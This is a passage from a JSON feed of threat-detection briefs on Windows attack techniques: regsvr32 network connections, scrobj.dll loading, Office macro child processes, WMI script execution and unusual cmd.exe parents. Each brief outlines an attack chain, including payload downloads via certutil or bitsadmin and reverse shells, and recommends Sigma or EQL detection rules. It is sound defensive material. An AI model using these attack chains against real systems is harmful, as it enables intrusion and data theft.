establishing persistence, or exfiltrating data (TA0005).\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the trusted binary or interpreter to proxy execution of their malicious code (T1127, T1218).\u003c/li\u003e\n\u003cli\u003eThe system is compromised, potentially leading to data theft, ransomware deployment, or lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack of this nature can lead to the compromise of Windows systems. Attackers can evade traditional defenses, making detection more challenging. The impact can range from data theft and system compromise to lateral movement and ransomware deployment. Organizations may experience financial loss, reputational damage, and operational disruption if systems are successfully compromised using this technique.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture process execution events, including the working directory and parent process, which is essential for activating the rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Suspicious Execution from Mounted Device\u0026rdquo; Sigma rule to your SIEM to detect potentially malicious processes being launched from unusual locations and tune for your environment.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of script interpreters and signed binaries from removable drives to mitigate the risk of this attack.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of executing files from untrusted sources, particularly from removable media, to prevent initial infection (T1204).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-suspicious-execution-mounted-device/","summary":"Attackers may use mounted devices as a non-standard working directory to execute signed binaries or script interpreters, evading traditional defense mechanisms, particularly when launched via explorer.exe.","title":"Suspicious Execution from a Mounted Device","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-execution-mounted-device/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Windows Security Event Logs"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","windows","process-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies instances of process execution originating from suspicious default Windows directories. Attackers often exploit these locations to conceal malware, leveraging the implicit trust associated with system or application paths to evade security measures. This tactic is employed to make malicious executions appear less conspicuous. The rule focuses on detecting specific processes, including \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003eregsvr32.exe\u003c/code\u003e, and others, when they are executed from unusual directories, such as \u003ccode\u003eC:\\\\PerfLogs\\\\\u003c/code\u003e, \u003ccode\u003eC:\\\\Users\\\\Public\\\\\u003c/code\u003e, and \u003ccode\u003eC:\\\\Windows\\\\Tasks\\\\\u003c/code\u003e. The intent is to highlight anomalous process behaviors that deviate from expected norms, providing early warning of potential malicious activity. The detection logic also includes filters to reduce false positives by excluding known legitimate executables and command line arguments from the specified directories.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means such as phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or drops a malicious payload into a suspicious directory like \u003ccode\u003eC:\\\\Users\\\\Public\\\\\u003c/code\u003e or \u003ccode\u003eC:\\\\Windows\\\\Tasks\\\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a legitimate Windows utility such as \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, or \u003ccode\u003ewscript.exe\u003c/code\u003e to execute the malicious payload.\u003c/li\u003e\n\u003cli\u003eThe executed script or binary performs malicious actions, such as establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to evade detection by masquerading the malicious activity as legitimate system processes.\u003c/li\u003e\n\u003cli\u003eThe malware may attempt to communicate with a command-and-control server.\u003c/li\u003e\n\u003cli\u003eThe malware may perform lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe final objective of the attacker is to exfiltrate sensitive data or cause damage to the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to malware infection, data compromise, and system instability. Attackers can establish persistent access, escalate privileges, and perform lateral movement within the network. The impact ranges from minor disruptions to significant data breaches depending on the attacker\u0026rsquo;s objectives and the compromised system\u0026rsquo;s role within the organization. The targeted sectors are broad, as this technique is applicable across various industries and organizational sizes.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Execution from Unusual Directory - Command Line\u0026rdquo; to your SIEM and tune for your environment to detect suspicious process executions from unusual directories.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule, focusing on the process execution chain and command-line arguments.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to provide the necessary data for the Sigma rule (reference log source in rule).\u003c/li\u003e\n\u003cli\u003eRegularly review and update the list of suspicious directories in the Sigma rule to reflect changes in your environment.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to restrict the execution of unauthorized applications from unusual directories.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:00:00Z","date_published":"2024-01-03T14:00:00Z","id":"/briefs/2024-01-03-execution-from-unusual-directory/","summary":"This rule identifies process execution from suspicious default Windows directories, which adversaries may abuse to hide malware in trusted paths to evade defenses.","title":"Execution from Unusual Directory - Command Line","url":"https://feed.craftedsignal.io/briefs/2024-01-03-execution-from-unusual-directory/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Sysmon"],"_cs_severities":["medium"],"_cs_tags":["windows","wmi","script_execution","initial_access","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the use of Windows script interpreters (cscript.exe or wscript.exe) to execute processes via Windows Management Instrumentation (WMI). Adversaries exploit WMI to execute scripts or processes stealthily, often using script interpreters. The rule monitors for these interpreters executing processes via WMI, specifically when initiated by non-system accounts, indicating potential malicious intent. The detection focuses on identifying scenarios where \u003ccode\u003ewmiutils.dll\u003c/code\u003e is loaded by \u003ccode\u003ewscript.exe\u003c/code\u003e or \u003ccode\u003ecscript.exe\u003c/code\u003e, followed by \u003ccode\u003ewmiprvse.exe\u003c/code\u003e spawning a new process. This is often associated with malicious initial access or execution techniques.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access via phishing (T1566) or other means.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a script, such as VBScript or JavaScript (T1059.005, T1059.007), to execute commands using WMI.\u003c/li\u003e\n\u003cli\u003eThe script interpreter (\u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e) loads \u003ccode\u003ewmiutils.dll\u003c/code\u003e to interact with WMI.\u003c/li\u003e\n\u003cli\u003eThe WMI Provider Host process (\u003ccode\u003ewmiprvse.exe\u003c/code\u003e) is invoked as a parent process, triggered by the script execution.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewmiprvse.exe\u003c/code\u003e executes a secondary process, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, or other executables, often from unusual locations like \u003ccode\u003eC:\\\\Users\\\\\u003c/code\u003e or \u003ccode\u003eC:\\\\ProgramData\\\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed process performs malicious actions, such as downloading additional payloads or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to maintain persistence by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often lateral movement, data exfiltration, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, bypass security controls, and establish persistence on the compromised system. The use of WMI enables stealthy execution, making detection challenging. The impact can range from data theft and system compromise to full network takeover. In some cases, threat actors may deploy ransomware, leading to significant financial losses and operational disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 7 (Image Loaded) logging to provide the necessary data for the provided Sigma rules.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u0026ldquo;WMI Scripting Process Creation\u0026rdquo; to detect suspicious process creation events originating from \u003ccode\u003ewmiprvse.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the provided Sigma rule \u0026ldquo;WMI Scripting Process Creation\u0026rdquo; with a focus on processes spawned by wmiprvse.exe from unusual locations or with suspicious command-line arguments.\u003c/li\u003e\n\u003cli\u003eImplement endpoint protection policies to block or alert on the execution of high-risk processes when initiated by non-system accounts as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eRegularly review and update endpoint protection policies to block or alert on the execution of high-risk processes like those listed in the detection query, especially when initiated by non-system accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-script-execution/","summary":"The rule identifies the use of Windows script interpreters (cscript.exe or wscript.exe) executing a process via Windows Management Instrumentation (WMI), which may indicate malicious activity, especially when initiated by non-system accounts.","title":"Windows Script Interpreter Executing Process via WMI","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["execution","windows","cmd.exe"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne"],"content_html":"\u003cp\u003eThis detection rule identifies unusual parent processes spawning \u003ccode\u003ecmd.exe\u003c/code\u003e on Windows systems. While \u003ccode\u003ecmd.exe\u003c/code\u003e is a legitimate command-line interpreter, adversaries can exploit it by launching it from atypical parent processes to execute malicious commands stealthily. The rule focuses on identifying \u003ccode\u003ecmd.exe\u003c/code\u003e instances spawned by uncommon parent processes like \u003ccode\u003elsass.exe\u003c/code\u003e, \u003ccode\u003ecsrss.exe\u003c/code\u003e, and \u003ccode\u003eregsvr32.exe\u003c/code\u003e, which may indicate unauthorized or suspicious activity. The rule is based on the EQL query language and is designed for data generated by Elastic Defend, Microsoft Defender XDR, and SentinelOne Cloud Funnel, as well as Sysmon event logs. This detection helps in early threat detection by flagging anomalies in process relationships.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a malicious payload on the system.\u003c/li\u003e\n\u003cli\u003eThe malicious payload spawns \u003ccode\u003ecmd.exe\u003c/code\u003e to execute commands.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecmd.exe\u003c/code\u003e process is launched by an unusual parent process, such as \u003ccode\u003elsass.exe\u003c/code\u003e or \u003ccode\u003ecsrss.exe\u003c/code\u003e, instead of typical processes like \u003ccode\u003eexplorer.exe\u003c/code\u003e or \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecmd.exe\u003c/code\u003e process executes malicious commands, such as downloading additional payloads, modifying system configurations, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003ecmd.exe\u003c/code\u003e process to establish persistence on the system by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement by using \u003ccode\u003ecmd.exe\u003c/code\u003e to access other systems on the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data theft, system compromise, or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack leveraging an unusual parent process for \u003ccode\u003ecmd.exe\u003c/code\u003e can lead to a range of adverse outcomes, including system compromise, data theft, and ransomware deployment. The impact can vary depending on the attacker\u0026rsquo;s objectives and the level of access they gain. Without proper detection and response, organizations can suffer financial losses, reputational damage, and operational disruption. The severity is dependent on the specific commands executed via the spawned command prompt.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided EQL query to your Elastic Security environment to detect unusual parent processes for \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the necessary data for this detection and ensure proper configuration.\u003c/li\u003e\n\u003cli\u003eTune the EQL query for your environment by excluding legitimate parent processes, identified in the \u0026ldquo;False positive analysis\u0026rdquo; section, that may trigger false positives (e.g., \u003ccode\u003eSearchIndexer.exe\u003c/code\u003e, \u003ccode\u003eWUDFHost.exe\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule to determine the nature of the malicious activity and the extent of the compromise.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring and logging for \u003ccode\u003ecmd.exe\u003c/code\u003e and its parent processes to detect similar anomalies in the future.\u003c/li\u003e\n\u003cli\u003eConsider deploying endpoint detection and response (EDR) solutions like Elastic Defend, Microsoft Defender XDR, or SentinelOne Cloud Funnel for enhanced visibility and protection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-unusual-cmd-parent/","summary":"The detection rule identifies cmd.exe instances spawned by uncommon parent processes, such as lsass.exe, csrss.exe, or regsvr32.exe, which may indicate unauthorized or suspicious activity, thus aiding in early threat detection.","title":"Unusual Parent Process for cmd.exe","url":"https://feed.craftedsignal.io/briefs/2024-01-unusual-cmd-parent/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SolarWinds.BusinessLayerHost.exe","SolarWinds.BusinessLayerHostx64.exe","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["supply-chain","execution","solarwinds"],"_cs_type":"advisory","_cs_vendors":["Elastic","SolarWinds","SentinelOne"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious child processes initiated by SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe, excluding known legitimate operations. Adversaries may exploit the trusted SolarWinds processes to execute unauthorized programs with elevated privileges, bypassing security controls. The rule focuses on Windows systems and is designed to detect activity indicative of post-compromise actions following a supply chain attack. This detection is crucial for organizations that utilize SolarWinds software, as malicious actors could leverage compromised SolarWinds installations to gain unauthorized access and execute arbitrary code within the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise of the SolarWinds software supply chain (T1195.002).\u003c/li\u003e\n\u003cli\u003eMalicious code is injected into SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eThe compromised SolarWinds process spawns a suspicious child process.\u003c/li\u003e\n\u003cli\u003eThe child process executes a malicious command or binary, attempting to evade detection.\u003c/li\u003e\n\u003cli\u003eThe child process leverages Native APIs (T1106) to perform privileged actions.\u003c/li\u003e\n\u003cli\u003eLateral movement or data exfiltration may occur from the compromised host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the execution of arbitrary code on systems running SolarWinds software. This can result in data theft, system compromise, and further propagation of the attack throughout the network. Organizations in various sectors utilizing SolarWinds products are potentially at risk. The impact may include loss of sensitive data, disruption of critical services, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious SolarWinds Child Process - CommandLine\u003c/code\u003e to detect potentially malicious child processes of SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious SolarWinds Child Process - Executable\u003c/code\u003e to detect execution of unusual executables as child processes of SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line details on Windows systems to ensure the Sigma rules have sufficient data.\u003c/li\u003e\n\u003cli\u003eReview and tune the rules for false positives based on legitimate SolarWinds child processes in your environment, updating the exclusion lists in the rules accordingly, referencing the \u0026ldquo;false_positives\u0026rdquo; section in the rule description.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-solarwinds-child-process/","summary":"Detection of unusual child processes spawned by SolarWinds processes may indicate malicious program execution, potentially bypassing security controls.","title":"Suspicious SolarWinds Child Process Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-solarwinds-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Elastic Endgame","Sysmon","Windows"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eThis detection identifies suspicious usage of \u003ccode\u003escrobj.dll\u003c/code\u003e, a legitimate Windows library, when loaded into unusual Microsoft processes. Attackers may exploit \u003ccode\u003escrobj.dll\u003c/code\u003e to execute malicious scriptlets within trusted processes, thereby evading detection. This technique allows adversaries to proxy execution through trusted system binaries. The rule focuses on detecting anomalous activity by excluding common executables, and flagging only non-standard processes loading \u003ccode\u003escrobj.dll\u003c/code\u003e. The detection logic is based on identifying image load events where \u003ccode\u003escrobj.dll\u003c/code\u003e is loaded into unexpected processes, indicating a potential misuse of the library. The rule is designed for data generated by Elastic Defend, Elastic Endgame, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts or deploys a malicious scriptlet designed to execute malicious commands or payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a non-standard or less common Microsoft process to load \u003ccode\u003escrobj.dll\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003escrobj.dll\u003c/code\u003e is loaded into the target process, enabling the execution of scriptlets.\u003c/li\u003e\n\u003cli\u003eThe malicious scriptlet executes within the context of the trusted Microsoft process, bypassing application whitelisting or other security controls.\u003c/li\u003e\n\u003cli\u003eThe scriptlet performs malicious actions, such as downloading additional payloads, modifying system configurations, or establishing command and control communication.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objectives, such as data exfiltration, lateral movement, or persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code within the context of a trusted process, bypassing security controls and potentially leading to full system compromise. This could result in data theft, system corruption, or further propagation of the attack within the network. The impact is significant because it allows malware to operate under the guise of legitimate system processes.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious Scrobj.dll Image Load\u003c/code\u003e to your SIEM to detect this activity (see rule below).\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 7 (Image Loaded) to collect the necessary data for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule \u003ccode\u003eSuspicious Scrobj.dll Image Load\u003c/code\u003e to determine the legitimacy of the \u003ccode\u003escrobj.dll\u003c/code\u003e loading activity.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to prevent unauthorized execution of scripts and binaries, focusing on processes identified in the detection rule.\u003c/li\u003e\n\u003cli\u003eContinuously audit scheduled tasks and exclude known safe processes from the detection rule to minimize false positives, as described in the rule\u0026rsquo;s Triage and Analysis section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-suspicious-scrobj-load/","summary":"Detection of scrobj.dll loaded into unusual Microsoft processes indicates potential malicious scriptlet execution for defense evasion and execution by abusing legitimate system binaries.","title":"Suspicious Script Object Execution via scrobj.dll","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-scrobj-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["execution","defense evasion","windows","regsvr32"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers may abuse native Windows registration utilities such as \u003ccode\u003eregsvr32.exe\u003c/code\u003e, \u003ccode\u003eRegAsm.exe\u003c/code\u003e, and \u003ccode\u003eRegSvcs.exe\u003c/code\u003e to execute malicious code and bypass security controls. These utilities are often used to register and unregister COM objects and .NET assemblies, but can also be leveraged to download and execute arbitrary scripts from remote locations. The behavior is commonly seen in post-exploitation scenarios. This activity can be used to bypass application allow lists and evade defenses. This behavior has been observed across multiple threat actors and attack campaigns, making it a reliable indicator of suspicious or malicious activity. This detection focuses on the network connection initiated by these utilities, highlighting potential misuse.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means, such as exploiting a vulnerability or using stolen credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a registration utility (e.g., \u003ccode\u003eregsvr32.exe\u003c/code\u003e) to execute a malicious script or download a payload from a remote server.\u003c/li\u003e\n\u003cli\u003eThe registration utility makes an outbound network connection to a malicious server to download the payload.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, potentially leading to further compromise of the system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance on the compromised system to gather information about the environment.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems on the network, leveraging the compromised system as a pivot point.\u003c/li\u003e\n\u003cli\u003eThe attacker installs persistence mechanisms to maintain access to the compromised environment.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive data or deploys ransomware, depending on their objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers to install malware, steal sensitive data, or disrupt business operations. The affected systems can be used as a beachhead for further attacks on the internal network, potentially leading to widespread compromise. The use of signed Microsoft binaries makes detection more challenging, as these tools are often trusted by default. While the risk_score is low at 21 and severity low, this is often related to initial access and could lead to high impact down the line.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation (Event ID 1) and network connection (Event ID 3) logging to ensure visibility into the execution of registration utilities and their network activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect suspicious network connections initiated by \u003ccode\u003eregsvr32.exe\u003c/code\u003e, \u003ccode\u003eRegAsm.exe\u003c/code\u003e, and \u003ccode\u003eRegSvcs.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on the command-line arguments used and the destination IP addresses.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a compromised system, restricting lateral movement.\u003c/li\u003e\n\u003cli\u003eMonitor for unexpected registry modifications associated with the execution of registration utilities, as these can indicate persistence mechanisms.\u003c/li\u003e\n\u003cli\u003eReview and update application allow lists to ensure that only authorized uses of registration utilities are permitted.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-regsvr-network-connection/","summary":"The native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection may indicate an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary.","title":"Suspicious Network Connection via Registration Utility","url":"https://feed.craftedsignal.io/briefs/2024-01-regsvr-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Office","Microsoft Word","Microsoft Excel","Microsoft PowerPoint","Outlook"],"_cs_severities":["medium"],"_cs_tags":["initial-access","defense-evasion","execution","discovery","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies suspicious child processes spawned by Microsoft Office applications (Word, PowerPoint, Excel, Outlook), which are commonly targeted for initial access via malicious documents or macro exploitation. The rule focuses on identifying anomalous process executions originating from these applications, a tactic often employed to execute arbitrary code or download additional payloads. Attackers leverage Office applications due to their widespread use and inherent scripting capabilities. Successful exploitation can lead to arbitrary code execution, lateral movement, and data exfiltration. This detection helps defenders identify and respond to potential security breaches originating from Microsoft Office applications, reducing the attack surface and minimizing potential damage. The rule specifically looks for processes like \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, and others being spawned by Office applications.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user receives a malicious Microsoft Office document (e.g., Word, Excel) via email or downloads it from a compromised website.\u003c/li\u003e\n\u003cli\u003eThe user opens the document, triggering the execution of a malicious macro or exploitation of a vulnerability within the Office application.\u003c/li\u003e\n\u003cli\u003eThe Office application (e.g., \u003ccode\u003ewinword.exe\u003c/code\u003e, \u003ccode\u003eexcel.exe\u003c/code\u003e) spawns a suspicious child process such as \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe spawned process executes a command to download a malicious payload from a remote server using \u003ccode\u003ebitsadmin.exe\u003c/code\u003e or \u003ccode\u003ecertutil.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is a reverse shell or a malware dropper, which establishes a connection to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the compromised system and attempts to escalate privileges and perform reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses discovery commands with \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eipconfig.exe\u003c/code\u003e, \u003ccode\u003etasklist.exe\u003c/code\u003e, and \u003ccode\u003ewhoami.exe\u003c/code\u003e to map the environment and identify valuable targets.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems within the network, aiming to compromise critical assets and achieve their objectives, such as data theft or ransomware deployment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers to gain initial access to the compromised system. This can result in data theft, installation of malware, lateral movement to other systems, and ultimately, significant disruption to business operations. The widespread use of Microsoft Office makes it a prime target, potentially affecting a large number of users and organizations. Failure to detect and respond to these attacks can result in significant financial losses, reputational damage, and compromise of sensitive data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging (Sysmon Event ID 1 or Windows Security Event Logs) to ensure the visibility required to detect suspicious child processes.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious MS Office Child Process\u003c/code\u003e to your SIEM and tune the rule based on your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the \u003ccode\u003eSuspicious MS Office Child Process\u003c/code\u003e Sigma rule by examining the parent process tree and associated network connections.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized processes from Microsoft Office applications.\u003c/li\u003e\n\u003cli\u003eRegularly update Microsoft Office applications to patch known vulnerabilities.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains or IPs associated with malware delivery and command and control, based on threat intelligence feeds and IOCs from external sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-suspicious-office-child-process/","summary":"Detects suspicious child processes of Microsoft Office applications, indicating potential exploitation or malicious macros for initial access, defense evasion, and execution.","title":"Suspicious MS Office Child Process","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-office-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Elastic Endgame","Windows Security Event Logs","Crowdstrike"],"_cs_severities":["medium"],"_cs_tags":["execution","persistence","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Crowdstrike"],"content_html":"\u003cp\u003eThe rule detects suspicious usage of \u003ccode\u003emofcomp.exe\u003c/code\u003e, 